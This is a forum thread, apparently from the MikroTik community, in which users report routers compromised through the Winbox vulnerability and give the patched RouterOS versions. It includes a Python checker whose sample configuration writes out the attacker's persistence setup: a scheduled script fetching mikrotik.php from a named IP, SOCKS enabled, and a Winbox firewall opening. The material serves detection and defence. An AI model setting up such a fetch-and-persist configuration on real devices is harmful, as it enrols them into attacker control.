new vulnerability?

Hello all.

I've noticed on several routers I have that there's a new vulnerability affecting versions 6.41.3 mostly; I'm not sure before 6.42.6 though.

The attack involves the creation of a schedule and a script fetching /mikrotik.php every 30 secs under this IP: 95.154.216.160
Has anyone noticed the same?
Is Mikrotik aware of this?

Also the same in this topic.

http://forum.mikrotik.com/t/intrusion-shortly-after-sending-support-file/121622/1

Yes, this is the Winbox vulnerability from April. You must patch to current, as it was fixed in 6.42.1.

About 26 hours ago I had a router exploited and it left the same traces (socks enabled, filter rule position 0 allowing Winbox, script fetching that PHP file on schedule). It seems very much like someone preparing a botnet.
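A check for the three traces listed in the post above (SOCKS enabled, an accept rule for Winbox at filter position 0, a script or scheduler entry fetching mikrotik.php), added here as an example and not taken from the thread or from MikroTik. It assumes the text output of RouterOS `/export` and the default Winbox port 8291; the sample configuration is constructed and the function names are hypothetical.

```python
import re

# Constructed sample of RouterOS "/export" output showing the traces from the post.
SAMPLE_EXPORT = r'''
/ip firewall filter
add action=accept chain=input dst-port=8291 protocol=tcp
add action=drop chain=input in-interface=ether1
/ip socks
set enabled=yes
/system scheduler
add interval=30s name=sched1 on-event=script1
/system script
add name=script1 source="/tool fetch address=95.154.216.160 \
    src-path=/mikrotik.php mode=http"
'''

def parse_sections(export_text):
    """Group export lines by menu path, joining backslash-continued lines."""
    joined = re.sub(r"\\\r?\n\s*", "", export_text)
    sections, current = {}, None
    for line in joined.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            current = line
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections

def find_traces(export_text):
    """Return the names of the compromise traces present in the export."""
    s = parse_sections(export_text)
    findings = []
    if any(re.search(r"\benabled=yes\b", l) for l in s.get("/ip socks", [])):
        findings.append("socks-enabled")
    # Only the first filter rule counts: the post describes it at position 0.
    rules = [l for l in s.get("/ip firewall filter", []) if l.startswith("add")]
    if rules and all(k in rules[0] for k in ("action=accept", "chain=input")) \
            and re.search(r"dst-port=\S*\b8291\b", rules[0]):  # 8291: assumed default Winbox port
        findings.append("winbox-accept-at-position-0")
    jobs = s.get("/system script", []) + s.get("/system scheduler", [])
    if any("fetch" in l and "mikrotik.php" in l for l in jobs):
        findings.append("fetch-mikrotik.php")
    return findings

if __name__ == "__main__":
    print(find_traces(SAMPLE_EXPORT))
```

An empty result only means these three traces are absent from the export; it says nothing about whether the router runs a patched RouterOS version.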

If it is that vulnerability, then it is also fixed since RouterOS versions 6.40.8 and 6.43rc4.

The April vulnerability (or more like the person/group/entity mass-misusing it) typically involved downloading an “update.aspx” page. If this one uses mikrotik.php, it is likely to be a different attacker, who is most probably (but not certainly) using the same vulnerability.

Thanks for sharing.

Please don't misinform people with these topics.